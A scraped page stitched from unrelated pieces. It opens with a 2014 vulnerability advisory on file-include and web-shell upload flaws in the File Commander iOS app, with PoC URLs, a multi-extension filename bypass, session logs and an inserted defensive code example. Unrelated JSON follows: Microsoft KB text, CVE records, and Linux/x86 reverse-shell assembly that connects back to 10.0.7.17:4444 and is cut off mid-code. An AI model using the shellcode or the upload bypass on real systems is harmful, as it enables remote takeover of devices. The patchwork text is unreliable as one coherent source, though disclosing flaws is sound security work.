This is an app which can change the way you use your iphone/itouch. With this app, when you try to read a document or listen to music
or even want to watch some video, you don't have to change apps round by round. You can deal with them in one app with simple operation.
And we can even provide the wifi share: you can share whatever files you like with your friends or your PC/MAC. And of course you can send
the files on your PC/MAC to your iphone/itouch. You can enjoy your files without changing pages, anywhere and anytime you want.
(Copy of the Homepage: https://itunes.apple.com/de/app/file-commander/id484450911 )
Abstract Advisory Information:
The Vulnerability Laboratory Research Team discovered multiple high severity vulnerabilities in the official Vanctech File Commander v1.1 iOS mobile web-application.
Vulnerability Disclosure Timeline:
2014-03-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
Published
Affected Product(s):
Shanghai Fan Cheng Software Ltd
Product: File Commander - iOS Mobile Web Application 1.1
Exploitation Technique:
Remote
Severity Level:
High
Technical Details & Description:
1.1
A local file include web vulnerability has been discovered in the official Vanctech File Commander v1.1 iOS mobile web-application.
A file include web vulnerability allows remote attackers to include unauthorized local file/path requests or system-specific path commands
to compromise the web-application or mobile device.
The web vulnerability is located in the `filename` value of the `upload` module POST method request. Remote attackers are able to inject their own
files with a malicious `filename` value in the upload POST method request to compromise the mobile web-application. The attack vector is on
the application side and the request method used to inject is POST. The local file/path include executes in the index file commander
directory listing. The security risk of the local file include web vulnerability is estimated as high(+) with a CVSS (Common Vulnerability Scoring
System) count of 7.4(+)|(-)7.5.
Exploitation of the local file include web vulnerability requires no user interaction and no privileged mobile web-application user account.
Successful exploitation of the local file include web vulnerability results in compromise of the mobile application or connected device components.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Select File > Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir List (http://localhost:8080/)
1.2
An arbitrary file upload web vulnerability has been discovered in the official Vanctech File Commander v1.1 iOS mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
The vulnerability is located in the `select file` function of the upload resource module. Remote attackers are able to upload PHP or JS web-shells
by renaming the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads, for example, a web-shell with the following
name and extension: `ptest.png.html.php.js.aspx.png`. After the upload the attacker opens the file via its path value in the web application,
removes the trailing .png file extension, and can then access the application with elevated executable access rights. The attack vector is on the application side
of the vulnerable wifi interface service and the request method is POST. To access the file the attacker requests the public `./Download` path.
There are two ways to include local files. The first is to sync with a local user account on the affected device running the vulnerable software. The second
is to access the wifi interface and upload the files remotely over the local or public network. The security risk of the arbitrary file upload
web vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 7.1(+)|(-)7.2.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction and no privileged application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access, because the device is compromised after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Select File > Upload
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] Downloads File Dir (http://localhost:8080/files?x)
Proof of Concept (PoC):
1.1
The local file include web vulnerability can be exploited by local attackers without a privileged web-application user account or user interaction.
For security demonstration or to reproduce the local web vulnerability, follow the information and steps below.
PoC:
http://localhost:8080/files?./[LOCAL FILE INCLUDE VULNERABILITY!]
http://localhost:8080/files/[UPLOAD PATH VALUE]/[LOCAL FILE INCLUDE VULNERABILITY!]
PoC: Vulnerable File Item List JScript
<script type="text/javascript" charset="utf-8">
    var now = new Date();
    // The listing is fetched as JSON from /files; item.name is the stored upload filename.
    $.getJSON("/files?" + now.toString(),
    function(data){
        var shadow = false;
        $.each(data, function(i, item){
            var trclass = '';
            if (shadow)
                trclass = " class='shadow'";
            // Only the href is URI-encoded (and, as printed here, the replace() call changes nothing);
            // item.name itself is concatenated into the row markup without any encoding.
            encodeName = encodeURI(item.name).replace("'", "'");
            $("<tr" + trclass + "><td><a href='/files/" + encodeName + "' class='file'>" + item.name + "</a></td> <td>" + item.size + "</td><td>" + item.modDate + "</td></tr>").appendTo("#filelist");
            shadow = !shadow;
        });
    });
</script>
Reference(s):
http://localhost:8080/files/
1.2
The arbitrary file upload web vulnerability can be exploited by remote attackers without a privileged application user account or user interaction.
For security demonstration or to reproduce the vulnerability, follow the information and steps below.
PoC: Upload Path (Download)
http://localhost:8080/Download/test.jpg.html.php.asp.html.jpg
http://localhost:8080/Download/[ARBITRARY FILE UPLOAD VULNERABILITY!]
Reference(s):
http://localhost:8080/Download/
Solution - Fix & Patch:
1.1
The local file include web vulnerability can be patched by securely parsing and encoding the vulnerable `filename` value of the upload POST method request.
Also filter and encode the filename output in the index JS item script to prevent injection or code execution in the name column of the listing.
1.2
Filter and restrict the filename validation on uploads to prevent arbitrary file upload attacks. Implement dedicated exception handling that restricts
and disallows files with multiple extensions. Remove execute rights for HTML and PHP content in the embedded web server's configuration for /files.
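The following is an added example, not code from the File Commander app or from the advisory's authors. It shows the two fixes described above (1.1: encode the `filename` value and the listing output; 1.2: refuse filenames with multiple extensions) in working form: a check on the client-supplied filename of the `newfile` multipart part, and a safe replacement for the listing script's string concatenation. The `newfile` field name and the `/files` path come from the advisory; the extension allow-list, the function names and the sample upload body are assumptions constructed for illustration.

```javascript
// Added example, not code from the File Commander app or from the advisory's
// authors. It implements the two fixes the advisory asks for: strict
// validation of the client-supplied filename in the "newfile" multipart part
// (single extension, allow-listed, no path characters) and HTML/URL encoding
// of item.name when the /files listing row is rendered. The "newfile" field
// and /files path come from the advisory; the extension lists, function names
// and sample upload body are assumptions constructed for illustration.

const ALLOWED_EXT = new Set(["png", "jpg", "jpeg", "gif", "pdf", "txt", "mp3", "mp4"]);
const SERVER_EXECUTED_EXT = new Set(["php", "html", "htm", "js", "asp", "aspx", "jsp", "cgi"]);

// Minimal extraction of filename="..." for one named part of a
// multipart/form-data body; the app's upload form sends a single "newfile" part.
function extractUploadFilename(body, fieldName) {
  const field = fieldName || "newfile";
  const re = new RegExp(
    'Content-Disposition: form-data; name="' + field + '"; filename="([^"\\r\\n]*)"'
  );
  const m = re.exec(body);
  return m ? m[1] : null;
}

// Decide whether a client-supplied filename may be stored. Returns
// { ok, reason } so the caller can log why an upload was refused.
function checkUploadFilename(name) {
  if (typeof name !== "string" || name.length === 0 || name.length > 255) {
    return { ok: false, reason: "missing or oversized filename" };
  }
  // Separators, traversal and NUL are refused outright rather than "cleaned".
  if (/[\\\/\u0000]/.test(name) || name.includes("..")) {
    return { ok: false, reason: "path characters in filename" };
  }
  const parts = name.toLowerCase().split(".");
  if (parts.length < 2 || parts[0] === "" || parts[parts.length - 1] === "") {
    return { ok: false, reason: "no usable extension" };
  }
  const exts = parts.slice(1);
  // Chains such as ptest.png.html.php.js.aspx.png are refused as a class; the
  // reason also names the segments a web server would execute, for the log.
  if (exts.length > 1) {
    const executed = exts.filter((e) => SERVER_EXECUTED_EXT.has(e));
    return {
      ok: false,
      reason: "multiple extensions" + (executed.length ? " incl. executable: " + executed.join(",") : ""),
    };
  }
  if (!ALLOWED_EXT.has(exts[0])) {
    return { ok: false, reason: "extension not on allow-list: " + exts[0] };
  }
  return { ok: true, reason: "" };
}

// Escape a value for insertion into HTML text or a quoted attribute.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Safe counterpart of the listing script's string concatenation: the link
// target is percent-encoded as one path segment and every value is HTML-escaped.
function renderFileRow(item, shadow) {
  const href = "/files/" + encodeURIComponent(item.name);
  return (
    "<tr" + (shadow ? " class='shadow'" : "") + "><td><a href='" + escapeHtml(href) +
    "' class='file'>" + escapeHtml(item.name) + "</a></td><td>" + escapeHtml(item.size) +
    "</td><td>" + escapeHtml(item.modDate) + "</td></tr>"
  );
}

// Constructed sample request body, modelled on the advisory's PoC session log.
const SAMPLE_UPLOAD_BODY =
  "-----------------------------36532693528160\r\n" +
  'Content-Disposition: form-data; name="newfile"; filename="test.jpg.html.php.asp.html.jpg"\r\n' +
  "Content-Type: image/jpeg\r\n\r\n" +
  "(image bytes)\r\n" +
  "-----------------------------36532693528160--\r\n";

// Run the upload check on the sample body and render one listing row whose
// name contains quote and angle-bracket characters.
function demo() {
  const uploaded = extractUploadFilename(SAMPLE_UPLOAD_BODY, "newfile");
  const verdict = checkUploadFilename(uploaded);
  const row = renderFileRow({ name: "it's <new>.png", size: 12, modDate: "2014-03-28" }, false);
  return { uploaded, verdict, row };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

The check rejects rather than rewrites: a name with a separator, `..` or more than one extension is refused with a reason that can be written to the server log, and a single extension is then compared against an allow-list. Rendering keeps the same row layout as the original script but encodes the name once for the URL path and once for HTML, so a stored name can no longer inject markup into the `#filelist` table. The web-server setting that stops `/files` content from being executed is a separate configuration change and is not shown here.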
Security Risk:
1.1
The security risk of the local file include web vulnerability in the file commander interface is estimated as high.
1.2
The security risk of the arbitrary file upload web vulnerability in the file commander interface is estimated as high(+).
Credits & Authors:
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website are trademarks of the vulnerability-lab team and the specific authors or managers. To record, list (feed),
modify, use or edit our material, contact admin@vulnerability-lab.com or research@vulnerability-lab.com to get permission.
-- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com
Source Record Details:
Document Title: Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities
References (Source): http://www.vulnerability-lab.com/get_content.php?id=1235
Release Date: 2014-03-28
Vulnerability Laboratory ID (VL-ID): 1235
Common Vulnerability Scoring System: 7.3
Record: SECURITYVULNS:DOC:30438 (https://vulners.com/securityvulns/SECURITYVULNS:DOC:30438), published 2014-04-01
PoC Session Logs [POST] (1.1):
12:01:20.676[96ms][total 96ms] Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[67] Mime Type[text/html]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------245932080324620
Content-Disposition: form-data; name="newfile"; filename="2.png"
Content-Type: image/png
Source: File Management - Index (excerpt of the listing table; surrounding layout tables omitted)
<tr><th>Name</th><th>Size</th><th>Date Modified</th></tr>
<tbody id="filelist">./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!];
</tbody>
PoC Session Logs [POST] (1.2):
12:02:44.901[543ms][total 543ms] Status: 302[Found]
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[67] Mime Type[text/html]
Request Header: (same as for 1.1 above)
POST-Daten:
POST_DATA[-----------------------------36532693528160
Content-Disposition: form-data; name="newfile"; filename="test.jpg.html.php.asp.html.jpg[ARBITRARY FILE UPLOAD VULNERABILITY!]"
Content-Type: image/jpeg
Source: File Management - Downloads (excerpt of the listing table; surrounding layout tables omitted)
<tr><th>Name</th><th>Size</th><th>Date Modified</th></tr>
<tbody id="filelist">
[ARBITRARY FILE UPLOAD VULNERABILITY!]</tbody>
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
software are based in part on the work of RSA Data Security, Inc. Because Microsoft has included the RSA Data Security, Inc., software in this product, Microsoft is required to include the text below that accompanied such software: </span><ul class=\"sbody-free_list\"><li><span>Copyright 1990, RSA Data Security, Inc. All rights reserved.</span></li><li><span>License to copy and use this software is granted provided that it is identified as the \"RSA Data Security, Inc., MD5 Message-Digest Algorithm\" in all material mentioning or referencing this software or this function. License is also granted to make and use derivative works provided that such works are identified as \"derived from the RSA Data Security, Inc., MD5 Message-Digest Algorithm\" in all material mentioning or referencing the derived work.</span></li><li><span>RSA Data Security, Inc., makes no representations concerning either the merchantability of this software or the suitability of this software for any particular purpose. It is provided \"as is\" without express or implied warranty of any kind.</span></li></ul><span>These notices must be retained in any copies of any part of this documentation or software.</span></li><li><span>The Reporting Services mapping feature uses data from TIGER/Line Shapefiles that are provided courtesy of the U.S. Census Bureau (<a href=\"http://go.microsoft.com/fwlink/?linkid=179079\" id=\"kb-link-13\" target=\"_self\">http://www.census.gov/</a>). TIGER/Line Shapefiles are an extract of selected geographic and cartographic information from the Census MAF/TIGER database. TIGER/Line Shapefiles are available without charge from the U.S. Census Bureau. To obtain more information about the TIGER/Line shapefiles, go to <a href=\"http://go.microsoft.com/fwlink/?linkid=179080\" id=\"kb-link-14\" target=\"_self\">http://www.census.gov/geo/www/tiger</a>. 
The boundary information in the TIGER/Line Shapefiles is for statistical data collection and tabulation purposes only; its depiction and designation for statistical purposes does not constitute a determination of jurisdictional authority, rights of ownership, or entitlement, and does not reflect legal land descriptions. Census TIGER and TIGER/Line are registered trademarks of the U.S. Bureau of the Census.</span></li></ul><span>Copyright 2012 Microsoft. All rights reserved. </span></div></div></div></div></div><h2>References</h2><div class=\"kb-references-section section\"><span>For more information about how to determine the current SQL Server version and edition, click the following article number to go to the article in the Microsoft Knowledge Base: <br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/321185\" id=\"kb-link-15\">321185 </a> <br/> How to identify your SQL Server version and edition <br/> </div></span><span>The third-party products that this article discusses are manufactured by companies that are independent of Microsoft. 
Microsoft makes no warranty, implied or otherwise, about the performance or reliability of these products.</span></div></body></html>", "edition": 4, "modified": "2020-10-20T09:34:04", "id": "KB2979597", "href": "https://support.microsoft.com/en-us/help/2979597/", "published": "2020-10-20T09:34:04", "title": "KB2979597 - SQL Server 2008 R2 Service Pack 3 release information", "type": "mskb", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2021-02-02T06:14:28", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:21", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T05:35:21", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": 
"LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:21:32", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "zdt": [{"lastseen": "2018-05-24T18:49:09", "description": "Exploit for linux/x86 platform in category shellcode", "edition": 1, "published": "2018-05-24T00:00:00", "title": "Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) #Shellcode (101 Bytes)", "type": "zdt", "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-05-24T00:00:00", "id": "1337DAY-ID-30438", "href": "https://0day.today/exploit/description/30438", "sourceData": "/* Name : Jonathan \"Chops\" Crosby\r\n * Email : [email\u00a0protected]\r\n * Twitter : @securitychops\r\n * Website : https://securitychops.com\r\n * Blog Post : https://securitychops.com/2018/05/21/slae-assignment-2-reverse-shell-tcp-shellcode.html\r\n * Student ID : SLAE-1250\r\n * Assignment 2 : Reverse Shell TCP (Linux/x86)\r\n * Shellcode Length : 101 bytes\r\n * Shellcode Purpose: Initiate a reverse shell back to the ip address / port number on shellcode execution\r\n *\r\n * Assembly code to generate shellcode in provided C program:\r\n \r\n; assemble/link assembly with: \r\n; nasm -f elf32 -o shellcode.o shellcode.nasm\r\n; ld -o shellcode shellcode.o\r\n \r\nglobal _start\r\n \r\nsection .text\r\n_start:\r\n \r\n; for all socket based calls we will need to use socketcall\r\n; http://man7.org/linux/man-pages/man2/socketcall.2.html\r\n; \r\n; the relevant calls we will need to make will be:\r\n; 
-----\r\n; SYS_SOCKET socket(2) 0x01\r\n; SYS_BIND bind(2) 0x02\r\n; SYS_CONNECT connect(2) 0x03\r\n; SYS_LISTEN listen(2) 0x04\r\n; SYS_ACCEPT accept(2) 0x05\r\n; -----\r\n; due to the way the registers need to be loaded up we will need to\r\n; make the call to cocketcall by loading the following info into \r\n; the following registers\r\n; -----\r\n; eax : 0x66 (this is the value of socketcall)\r\n; ebx : SYS_* value (0x01, etc)\r\n; ecx : pointer to address on stack of parameters to subfunction\r\n \r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n; C version : int socket(domain, type , protocol)\r\n; ASM version: socketcall(SYS_SOCKET, socket(AF_INET,SOCK_STREAM,IPPROTO_IP))\r\n; Returns : socketid into eax\r\n; ----- \r\n; Param Values: \r\n; #define AF_INET 2 // Internet IP Protocol\r\n; http://students.mimuw.edu.pl/SO/Linux/Kod/include/linux/socket.h.html\r\n;\r\n; #define SOCK_STREAM 1 // stream (connection) socket\r\n; http://students.mimuw.edu.pl/SO/Linux/Kod/include/linux/socket.h.html\r\n;\r\n; #define IPPROTO_IP 0\r\n; If the protocol argument is zero, the default protocol for this address family and type shall be used. 
\r\n; http://pubs.opengroup.org/onlinepubs/009695399/functions/socket.html\r\n; -----\r\n; Registers before calling socketcall:\r\n;\r\n; /---eax---\\ /---ebx---\\ /--------ecx---------\\ \r\n; | 0x66 | | 0x01 | | byte, byte, byte |\r\n; \\---------/ \\---------/ | 0x02 0x01 0x00 |\r\n; \\--------------------/\r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n \r\n; push params to the stack last first\r\n \r\nxor eax, eax ; zeroing out edx to set IPPROTO_IP to 0\r\npush eax ; pushing IPPROTO_IP onto stack\r\npush byte 0x01 ; pushing SOCK_STREAM onto stack\r\npush byte 0x02 ; pushing AF_INET onto stack\r\n \r\nmov ecx, esp ; moving address of parameter structure into ecx \r\n \r\nxor eax, eax ; zeroing out eax\r\nmov al, 0x66 ; moving socketcall value into eax\r\n \r\nxor ebx, ebx ; zeroing out ebx\r\nmov bl, 0x01 ; moving SYS_SOCKET into ebx\r\n \r\nint 0x80 ; calling interupt which triggers socketcall\r\n \r\n; registers after calling socktcall\r\n \r\n; /----eax----\\ /---ebx---\\ /--------ecx---------\\\r\n; | socketid | | 0x01 | | *address to struct |\r\n; \\------------/ \\---------/ \\---------------------/\r\n \r\n; eax now contains our socketid, since eax is volitale \r\n; lets put it somewhere safe, like esi\r\n \r\nxchg eax, esi ; esi now contains our socketid\r\n ; and eax contains whatever was in esi\r\n \r\n; /----eax----\\ /---ebx---\\ /--------ecx---------\\ /---esi---\\\r\n; | garbage | | 0x01 | | *address to struct | | socketid |\r\n; \\------------/ \\---------/ \\---------------------/ \\---------/\r\n \r\n \r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n; C version : connect(socketid,(struct sockaddr *)&serverAddress, sizeof(serverAddress));\r\n; ASM version: socketcall(SYS_CONNECT, connect(socketid,(struct sockaddr *)&serverAddress, sizeof(serverAddress));\r\n; -----\r\n; Param Values:\r\n; socketid // currently stored in esi\r\n; \r\n; &serverAddress // memory on the stack for sockaddr\r\n; * 
http://pubs.opengroup.org/onlinepubs/7908799/xns/netinetin.h.html \r\n; * Values of this type must be cast to struct sockaddr for use with the socket interfaces\r\n; \r\n; this parameter is a struct of sockaddr_in which has the following structure\r\n;\r\n; struct sockaddr_in {\r\n; sa_family_t sin_family; // address family: AF_INET\r\n; in_port_t sin_port; // port in network byte order\r\n; struct in_addr sin_addr; // internet address\r\n; // Internet address.\r\n; struct in_addr {\r\n; uint32_t s_addr; // address in network byte order\r\n; };\r\n;\r\n; sa_family_t\r\n; #define AF_INET 2 // Internet IP Protocol\r\n; http://students.mimuw.edu.pl/SO/Linux/Kod/include/linux/socket.h.html\r\n; \r\n; in_port_t // port in network byte order / big endian\r\n; https://en.wikipedia.org/wiki/Endianness\r\n; port 9876 would be: word 0x2694\r\n;\r\n; sin_addr // uint32_t ia 4 bytes\r\n; ip bound to will be XXX.XXX.XXX.XXX\r\n; ip would be: dword 0xFFFF or whatever IP will end up being reversed\r\n;\r\n; sizeof(serverAddress) // this value represents bytes, so 4 bytes is 32bits\r\n; the value here is 16 bytes or 0x10h which is ultimaly 32bits\r\n; -----\r\n;\r\n; Registers before calling socketcall: \r\n;\r\n; /---eax---\\ /---ebx---\\ /--------------------------ecx-----------------------------\\\r\n; | 0x66 | | 0x03 | | socketid, mem of server address struct, size of struct |\r\n; \\---------/ \\---------/ | esi ecx 0x10 |\r\n; \\-------------------------|--------------------------------/\r\n \r\n; we need to create the first stack pointer for sockaddr_in\r\n \r\nxor edx, edx\r\n \r\npush edx\r\n \r\nmov byte [esp] , 0x0a ; 10\r\nmov byte [esp+2], 0x07 ; 07\r\nmov byte [esp+3], 0x11 ; 17\r\n \r\n ; mov byte [esp+1], 0x00 left out on purpose since\r\n ; this would put 0x00 in the final shellcode, which\r\n ; is generally considered bad practice since null\r\n ; tends to cause issues when executing\r\n \r\npush word 0x5C11 ; port number (0x115C is 4444 so we push little 
endian)\r\n \r\npush word 0x02 ; AF_INET - which is 0x02\r\n \r\nmov ecx, esp ; move stack pointer to ecx\r\n \r\npush byte 0x10 ; 16 byts long (or 32bit)\r\n \r\npush ecx ; pushing sockaddr_in into esp\r\n \r\npush esi ; sockid already in esi, so pushing it\r\n \r\nmov ecx, esp ; moving stack pointer to ecx\r\n \r\n; from the previous call ebx is already 0x01\r\n; lets increment it by one\r\ninc ebx ; increasing ebx from 1 to 2\r\ninc ebx ; and from 2 to 3\r\n \r\nxor eax, eax ; zeroing out eax\r\nmov al, 0x66 ; moving socketcall value into eax\r\n \r\nint 0x80 ; calling interupt which triggers socketcall\r\n \r\n; registers after calling socktcall\r\n \r\n; /----eax----\\ /---ebx---\\ /--------ecx---------\\ /---esi---\\\r\n; | uneeded | | 0x03 | | *address to struct | | socketid |\r\n; \\------------/ \\---------/ \\---------------------/ \\---------/\r\n \r\n \r\n;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\r\n; C version : int dup2(clientid, localDiscripToDuplicate);\r\n; ASM version: standard syscall using same format as above\r\n; ----- \r\n; Param Values: \r\n; clientid // currently stored in eax\r\n;\r\n; localDiscripToDuplicate // 0, 1, 2 